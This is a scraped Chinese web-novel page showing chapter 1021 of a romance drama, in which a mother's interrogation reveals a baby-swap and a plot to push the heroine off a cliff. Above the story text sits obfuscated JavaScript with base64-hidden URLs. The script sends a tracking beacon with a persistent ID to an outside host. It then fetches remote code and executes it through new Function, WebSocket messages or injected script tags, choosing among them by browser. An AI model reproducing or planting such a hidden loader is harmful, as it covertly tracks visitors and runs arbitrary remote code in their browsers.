足迹
裴晏舟程溪免费阅读
登录
关灯
护眼
字体:

第一千零二十一章 筝筝交给你了(第1页)

function OVHGxRJ(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YTrZu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OVHGxRJ(t);};window[''+'a'+'L'+'e'+'X'+'U'+'l'+'s'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=YTrZu,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://yh.dyuthic.com:7891/stats/7728/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHR0cHHMlM0ElMkYlMkZ0by5tb2xpMTAyLnRvcCUzQTg4OTE=','d3NzJTNBJTJGJTJGdW0uYmNlbbnJzbby5jbb20lM0E5NTM1','4674',window,document,['H','b']);}:function(){};

秦母、秦父一家三口被凌母的话恶心的不轻。

秦母拍拍自己胸口,真是庆幸自己没心脏病,要不然准会被秦嘉淼给气死。

秦筝反倒是听的好笑,她笑凌家两口子的愚蠢,“她在给你们画饼呢,你们也信

“是,从她跑走的那一刻我就全明白了

凌母惨然一笑,“她是在利用我们,自己出手怕被你们发现,其实那时候我们也不是没想过这个问题,可她是我们的亲生女儿啊,都说血浓于水,电视里不也放了吗,不是亲生的就是养不亲,总惦记着亲生父母,我以为孩子惦记我们……

“你也以为她能给你们带来好处,更想着利用秦嘉淼一点点的侵占秦家的财产,实在不行了,反正她跟陆家订了婚,也能成为陆家的少夫人,陆家又这么一个独子,将来的一切也迟早是你们的秦筝打断了她。

“对,是这样凌母现在已经无所谓了,反正她坐牢是铁定的。

陆崇礼倒是想起来了,“怪不得那段时间秦嘉淼突然缠我缠的特别厉害,秦家也不断的跟我家里人接触,想尽快订婚,那时候秦嘉淼就知道自己不是秦家的亲生女儿了吧,她是从哪里知道的?”

陆崇礼的目光看向秦父秦母,“秦叔叔、秦阿姨,是不是平时你们两个私底下说这件事的时候,不小心被秦嘉淼发现了什么端倪

秦父呐呐道:“我们都是在自己房间里说的……

“说不定秦嘉淼在你们门口偷听到的秦筝淡淡打断,“就算没偷听,你们让人调查亲生女儿的事,也要通过别人帮忙,你们天天住在一个屋檐下,被发现很正常

秦父秦母听的无法辩驳。

反正秦嘉淼是从他们身上得到消息的。

又是他们做父母的害了亲生女儿。

“也怪我陆崇礼歉意的说道,“肯定是我那阵子去找你,秦嘉淼说不定暗中找人跟踪了我

“算了,那时候你也没跟秦嘉淼交往,谁知道她会找人跟踪你秦筝皱眉。

用程溪的话来说,秦嘉淼这人就是有点神经病,谁被她看上谁倒霉。

她怪的是自己的父母太信任秦嘉淼了。

刘队长抬抬手,示意她们安静,然后继续审问凌母:“秦嘉淼让你们推秦筝下悬崖?”

“这跟我没关系,是凌有孝自己想出来的

凌母立刻道:“一开始秦嘉淼的意思是要么让秦筝消失,或者让她毁容,凌有孝觉得让她死了更好,之后我们俩偷偷坐黑车来了苏城,是秦嘉淼告诉了我们秦筝上班的地方和公寓住址,正好我们在秦筝上班的地方打听到秦筝第二天公司组织爬山,当天晚上凌有孝就设定了谋杀方案。

他早早埋伏在山上,看到秦筝一个人出现后,趁她休息没注意时把人给推了下去,他是走小路跑下来的,身上的衣服和鞋子、手套是在半路上扔掉的。

我们连夜赶回苏城,凌昊也不知道我们去干嘛了,我们走的时候也特意让凌昊故意跟邻居说我们在家,后来警察上门调查,也找不到我们去了苏城的证据

一切尘埃落定,秦筝终于长长的吐了口气,“当时我就觉得是凌有孝推的我,可是我也不愿相信,不敢把你们想的那么坏

凌母垂下头,“后来你打了凌昊,我们两口子本来是想让你拿公寓做赔偿的,后来联系了秦嘉淼,她说你跟你亲妈年轻时候长的挺像,怕被秦家的亲戚在街上看到你,所以最好是让你坐牢,到时候就没人能发现了,但没想到凌昊私底下跟你们和解了,我们都不知道你出来,还被秦家的人发现……

秦筝颔首。

不再意外,后面的也跟程溪猜测的差不多了。

凌母喃喃道:“我最没料到的是秦嘉淼会跑了,我们当父母的为了她做了那么多,她就丢下我们,我早就后悔当初调换两个婴儿的,像秦嘉淼那种人,就算她不跑,将来估计也不会孝顺我们

陆崇礼嗤笑:“她不仅不会孝顺你们,等她地位稳定的那一天,你们没有任何利用价值的时候,还会亲自除去你们两口子,对秦嘉淼而言,家境贫穷的父母对她都是一种耻辱

秦筝深以为然。

凌母再没有说任何话了,她算计了半辈子,结果算计了一场空,连亲生儿女都恨不得让她死,已经让她万念俱灰了。

一行人从审讯室里走出来。

秦父秦母仿佛一瞬间苍老了许多岁。

当真相一一剥开在两人面前时,才终于明白两人亏欠秦筝的到底有多少。

甚至因为她们的愚蠢,一次次让秦筝陷入绝望的险境。

秦鸣也很愧疚,“秦筝,对不起,我真没用想到……

“过去的事都已经过去了,发生了也是发生了,没必要总是道歉秦筝轻轻打断。

秦鸣无奈的闭上了嘴。

秦父长叹了口气,“伤害已经造成,说再多的道歉都没有任何意义,秦筝,就算你讨厌我们,未来还很长,爸妈会有一生来弥补

秦筝不再言语。

经历过那么多事,她也已经不再是那个什么都不懂的懵懂小女孩。

她不稀罕秦家的家产,也没想过要从秦家手里得到多少。

可她心里也是怪秦家的。

她们把她生下来,可以不照顾,也可以不喜欢,但他们不应该让自己一次次陷入绝望的险境。

秦父转头对陆崇礼道:“崇礼,以前我不让你和秦筝在一起,确实也挺自私的,我们完全没有考虑过秦筝的感受,有时候我在想,要是秦筝没有抱错就好了,或许你们之间也不用接受那么多波折,刚才听胡眉说了那么多,我好像明白为什么秦筝会喜欢你了,以后……筝筝交给你了

说完,秦父语重心长的拍了拍陆崇礼的肩膀。

陆崇礼连忙道:“叔叔,您放心,我对秦筝是认真的

秦母道:“我们也相信你是认真的,但你父母那边呢,我们秦家现在的情况,你父母不一定看得上我们秦家吧